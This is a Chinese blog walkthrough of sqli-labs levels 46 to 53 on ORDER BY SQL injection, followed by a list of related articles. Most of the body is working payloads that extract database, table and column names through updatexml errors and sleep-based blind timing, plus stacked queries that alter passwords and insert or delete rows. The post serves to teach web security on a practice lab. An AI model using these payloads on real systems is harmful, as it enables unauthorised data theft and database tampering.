sql-lab (46~53)(后持续更新) order by 注入

最新推荐文章于 2024-01-30 08:00:00 发布
最新推荐文章于 2024-01-30 08:00:00 发布
阅读量2.7k 收藏 2
点赞数
分类专栏: wed渗透 文章标签: sql 数据库 database
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62879498/article/details/122682175
版权

(46~50)

sql-lab-46

一进入46关页面就提示我们使用 sort :

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-p8wYua6X-1643081745033)(C:\Users\hcj\AppData\Roaming\Typora\typora-user-images\image-20220123100744179.png)]

我们尝试这使用 ?sort=1 发现:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-7rA2s6bx-1643081745034)(C:\Users\hcj\AppData\Roaming\Typora\typora-user-images\image-20220123101113651.png)]

然后 ?sort=2:
在这里插入图片描述

?sort=3:
在这里插入图片描述

我们发现当我们使用 sort=1 时 表格以第一列进行排列,sort=2 时 表格以第二列进行排列, sort=3 时 表格以第三列进行排序。我们想到了order by 函数 ,猜测可能是与 order by 函数相关的注入。

查看源码:

$sql = "SELECT * FROM users ORDER BY $id";

发现我们的猜测果然没错。

先了解下 order by参数注入:

order by 注入是指其后面的参数是可控的,

order by 不同于我们在 where 后的注入点,不能使用 union 等注入,其后可以跟接 报错注入 或者 时间盲注。

判断库名:?sort=-1 and updatexml(1,concat(0x7e,database(),0x7e),1)-- q

判断表名:?sort=-1 and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),0x7e),1)-- q

判断列名:?sort=-1 and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘emails’ limit 0,1),0x7e),1)-- q

查询数据:?sort=-1 and updatexml(1,concat(0x7e,(select id from emails limit 0,1),0x7e),1)-- q

sql-lab-47

原理与46关相同,区别只是闭合不同

判断库名:?sort=-1 'and updatexml(1,concat(0x7e,database(),0x7e),1)-- q

判断表名:?sort=-1 'and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),0x7e),1)-- q

判断列名:?sort=-1’and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘emails’ limit 0,1),0x7e),1)-- q

查询数据:?sort=-1 'and updatexml(1,concat(0x7e,(select id from emails limit 0,1),0x7e),1)-- q

sql-lab-48

在这一关只能使用时间盲注:

使用时间盲注

  1. 解析数据库名称:?sort=1 and if((ascii(substr(database(),1,1))=115),sleep(5),1)-- q 第一位是 s

  2. 解析表名:?sort=1 and if((ascii(substr((select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),1,1))=101),sleep(5),1)-- q 第一位是 e

  3. 解析字段名:?sort=1 and if((ascii(substr((select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘emails’ limit 0,1),1,1))=105),sleep(5),1)-- q 第一位是 i

  4. 获取数据: ?sort=1’ and if((ascii(substr((select id from emails limit 0,1),1,1))>1),sleep(5),1)-- q

sql-lab-49

和四十八关相同,仅仅只是闭合方式的不同

  1. 解析数据库名称:?sort=1 'and if((ascii(substr(database(),1,1))=115),sleep(5),1)-- q 第一位是 s

  2. 解析表名:?sort=1 'and if((ascii(substr((select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),1,1))=101),sleep(5),1)-- q 第一位是 e

  3. 解析字段名:?sort=1’and if((ascii(substr((select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘emails’ limit 0,1),1,1))=105),sleep(5),1)-- q 第一位是 i

  4. 获取数据: ?sort=1’ and if((ascii(substr((select id from emails limit 0,1),1,1))>1),sleep(5),1)-- q

sql-lab-50

进入题目,发现和之前的几道题是大差不差的,我们输入的语句依旧会拼接到order by后面,于是尝试使用报错注入,发现确实是可以的,那么这道题和前面的题目有啥区别呢?

我们查看一下源码:

mysqli_multi_query($con1, $sql)

所以说这道题就是堆叠注入和order by 注入的结合

?sort=1;update users set password=‘hcjtn’ where id=14–q

?sort=1;insert into users values(50,‘50’,‘50’)-- q

(51~53)

sql-lab51

做法和上一道题一致,只是闭合的区别。

使用报错注入或者时间盲注:

这里使用报错注入:

判断库名:?sort=-1 'and updatexml(1,concat(0x7e,database(),0x7e),1)-- q

判断表名:?sort=-1 'and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),0x7e),1)-- q

判断列名:?sort=-1’and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘emails’ limit 0,1),0x7e),1)-- q

查询数据:?sort=-1 'and updatexml(1,concat(0x7e,(select id from emails limit 0,1),0x7e),1)-- q

然后进行堆叠注入:

?sort=1’;insert into users values(21,‘02’,‘24’)-- q

sql-lab-52

一样的套路一样的方法,先判断闭合方式 发现该题没有闭合,然后尝试使用报错,将库名爆出来,发现无法使用,那么在本题只能使用时间盲注:

  1. 解析数据库名称:?sort=1’and if((ascii(substr(database(),1,1))=115),sleep(5),1)-- q 第一位是 s

  2. 解析表名:?sort=1 'and if((ascii(substr((select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),1,1))=101),sleep(5),1)-- q 第一位是 e

  3. 解析字段名:?sort=1’and if((ascii(substr((select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘emails’ limit 0,1),1,1))=105),sleep(5),1)-- q 第一位是 i

  4. 获取数据: ?sort=1’ and if((ascii(substr((select id from emails limit 0,1),1,1))>1),sleep(5),1)-- q

然后进行堆叠注入:

?sort=1 ;delete from users where id=50 – q

sql-lab-53

先判断闭合方式,发现没有闭合。

  1. 解析数据库名称:?sort=1 'and if((ascii(substr(database(),1,1))=115),sleep(5),1)-- q 第一位是 s

  2. 解析表名:?sort=1 'and if((ascii(substr((select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),1,1))=101),sleep(5),1)-- q 第一位是 e

  3. 解析字段名:?sort=1 'and if((ascii(substr((select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘emails’ limit 0,1),1,1))=105),sleep(5),1)-- q 第一位是 i

  4. 获取数据: ?sort=1’ and if((ascii(substr((select id from emails limit 0,1),1,1))>1),sleep(5),1)-- q

然后进行堆叠注入:

?sort=1’ ;delete from users where id=50 – q

hcjtn
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL-ORDER BY 多字段排序(升序、降序)
12-15
ORDER BY _column1, _column2; /* _column1升序,_column2升序 */ ORDER BY _column1, _column2 DESC; /* _column1升序,_column2降序 */ ORDER BY _column1 DESC, _column2 ; /* _column1降序,_column2升序 */ ORDER BY _column1 DESC, _column2 DESC; /* _column1降序,_column2降序 */ 您可能感兴趣的文章:SQL Server 排序
SQL注入进阶-order by注入
AkangBoy的博客
11-06 8446
本文从order by原理简介开始,详细描述了order by注入原理以及多种注入姿势,包含order by union select注入order by if()注入order by sleep()注入order by报错注入
SQL注入order by注入
最新发布
qq_68163788的博客
01-30 1675
Order by注入是一种SQL注入攻击的类型,它利用了在SQL查询中使用order by子句来对结果进行排序的漏洞。在正常情况下,order by子句会根据指定的列对结果进行排序,但是如果应用程序没有对用户提供的输入进行正确的验证和过滤,攻击者就可以利用这个漏洞来执行恶意的SQL查询。 通过在order by子句中插入恶意的SQL代码,攻击者可以获取敏感数据、修改数据库内容或者执行其他恶意操作。例如,攻击者可以利用order by注入来发现数据库中的表名、列名或者获取敏感数据。
关于Java中order by注入详解
m0_60571990的博客
03-17 1283
关于Java中order by注入详解
mysql 数值型注入_MySQL Order By 注入总结
weixin_30069113的博客
01-18 231
前言最近在做一些漏洞盒子后台项目的总结,在盒子众多众测项目中,注入类的漏洞占比一直较大。其中Order By注入型的漏洞也占挺大一部分比例,这类漏洞也是白帽子乐意提交的类型(奖金高、被过滤概览小)。今天给大家分享下一些关于Order By的有趣的经验。何为order by 注入本文讨论的内容指可控制的位置在order by子句后,如下order参数可控:select * from goods or...
sql注入order by注入
qq_45627785的博客
08-05 4314
Jan 1, 0001 00:00 · 427 words · 3 minute readCTF 了解order by order by盲注 结合union来盲注 基于if()盲注 需要知道列名 不需要知道列名 基于时间的盲注 基于rang()的盲注 order by 报错注入 updatexml extractvalue 在安恒杯看到了利用order by进行盲注,记得自己之前好像总结过order by后的注入方法,翻..
jupyterlab-sql:JupyterLabSQL GUI
01-30
jupyterlab-sql jupyterlab-sql向JupyterLab添加了一个SQL用户界面: 通过点击界面浏览表 使用自定义查询读取和修改数据库 安装 在JupyterLab 1.x上安装 要安装jupyterlab-sql ,请运行以下命令: pip install ...
SQL-lab:sql注入全部解析
04-17
SQL-labsql注入全部解析1. 先看题,要求输入一个数字入乡随俗,试一试很显然,会有回显接下来自由发挥,再输入一个2试试,又变了接下来,接下来试一试他的闭合方式添加完单引号,根据报错的回显,发现他是单引号闭合...
Like-and-OrderBy.rar_sql like order by
09-23
T-SQL中like和order by 语句的使用,以及之间的区别
适合DVWA和SQL-li-lab的PHPStudy、DVWA、SQL-li-labs
03-26
免费的工具包,下载安装配置好即可使用,给个小赞吧。
利用sqli-labs了解order by注入
qq_51769881的博客
06-09 324
(2)方法二:通过两个查询分别加括号的方式,注意 order by 不能出现在union的子句中,但可以出现在子句的子句中。(1)方法一:去掉前一个select语句的 order by,意思是先union再对整个结果集order by。(0)注意union在没有括号的情况下只能使用一个 order by,如果直接运行如下语句,会报错。​ union会过滤掉两个结果集中重复的行,而union all不会过滤掉重复行。(1)lines terminated by 写入。​ 利用条件:开启错误提示。
sqllabs less46~53
m0_51607644的博客
02-03 125
less46~49 order by注入 SQL语句$sql = “SELECT * FROM users ORDER BY $id”;我们可利用 order by 后的一些参数进行注入。 1.时间盲注 playload: ?sort=1 and if( left( (database()), 1) ='s' ,1,sleep(3))--+ 2.报错注入 playload:?sort=1 and updatexml(1,( select group_concat(0x7e,username,passw
sqli-Labs————less-46order by 之后的注入
Fly_鹏程万里
05-21 1320
前言从这一关开始将会介绍一下order by相关的注入内容。Less-46源代码:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.o...
sqli-labs(46)
weixin_30674525的博客
06-03 625
0X01首先我们先来看一下源码 发现查询语句变成了 order by 参数也变成了 sort 看看是什么样的 (1)首先看看本关sql语句 $sql = "SELECT * FROM users ORDER BY $id"; 在mysqlorder by 参数后可以加入升序和降序来改变排列顺序, 我们来看看mysql的帮助函数 0...
Sqlibs-Less46-53-order by注入
Xor0ne
07-14 409
46.less46-ORDER BY-Error-Numeric 46.1、注入分析 从本关开始,我们开始学习order by 相关注入的知识。 本关的sql语句为 sql="SELECT ∗ FROM users ORDER BY id"; 尝试?sort=1 desc或者asc,显示结果不同,则表明可以注入。(升序or降序排列) 从上述的sql语句中我们可以看出,我们的注入点在order by后面的参数中,而order by不同于的我们在where后的注入点,不能使用union等进行注入。如何进行o
Kali渗透测试(九)——DVWA SQL 注入
Bulldozer_GD的博客
07-16 581
Kali渗透测试(九)——DVWASQL注入 一. 低级别,没有对用户输入做任何限制,提及的数据直接拼接。 1. 查询所有数据库 2. 查询dvwa库中的表名 查询字段名 4. 查询用户名密码 5.也可以进行操作系统级别的命令执行 6.无权读取information_schema ,拒绝 union/order by 时: 猜列名:利用burpsuite Intruder 和字典文件 ' and column is null--猜表名 ' and table.user is n
mybatis的#{}和${}的区别以及order by注入问题
abfunnyboy的博客
07-08 2191
欢迎使用Markdown编辑器写博客本Markdown编辑器使用StackEdit修改而来,用它写博客,将会带来全新的体验哦: Markdown和扩展Markdown简洁的语法 代码块高亮 图片链接和图片上传 LaTex数学公式 UML序列图和流程图 离线写博客 导入导出Markdown文件 丰富的快捷键 快捷键 加粗 Ctrl + B 斜体 Ctrl + I 引用 Ctrl
sql-lab46
07-28
对不起,我无法回答关于sql-lab46关的问题。 #### 引用[.reference_title] - *1* *2* *3* [sql-lab(ALL 1-65)](https://blog.csdn.net/lee_maple/article/details/123363445)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值